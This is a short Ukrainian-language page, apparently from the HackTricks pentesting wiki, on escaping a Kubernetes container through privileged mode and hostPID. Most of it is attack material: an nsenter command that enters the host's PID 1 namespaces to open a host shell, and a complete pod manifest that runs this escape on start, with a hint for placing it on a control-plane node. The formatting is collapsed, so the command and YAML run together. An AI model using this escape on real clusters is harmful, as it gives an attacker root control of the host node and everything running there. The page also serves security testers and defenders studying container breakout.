Поділіться своїми хакерськими трюками, надсилайте PR доHackTricksіHackTricks Cloudрепозиторіїв на GitHub.
Привілеї та hostPID
З цими привілеями ви матимете доступ до процесів хоста та достатньо привілеїв для входу в простір імен одного з процесів хоста.
Зверніть увагу, що вам може потрібно не обов'язково мати привілеї, а лише деякі можливості та інші можливі обхідні заходи захисту (наприклад, apparmor та/або seccomp).
Просто виконавши щось на зразок наступного, ви зможете вийти з контейнера:
nsenter--target1--mount--uts--ipc--net--pid--bash
Приклад конфігурації:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name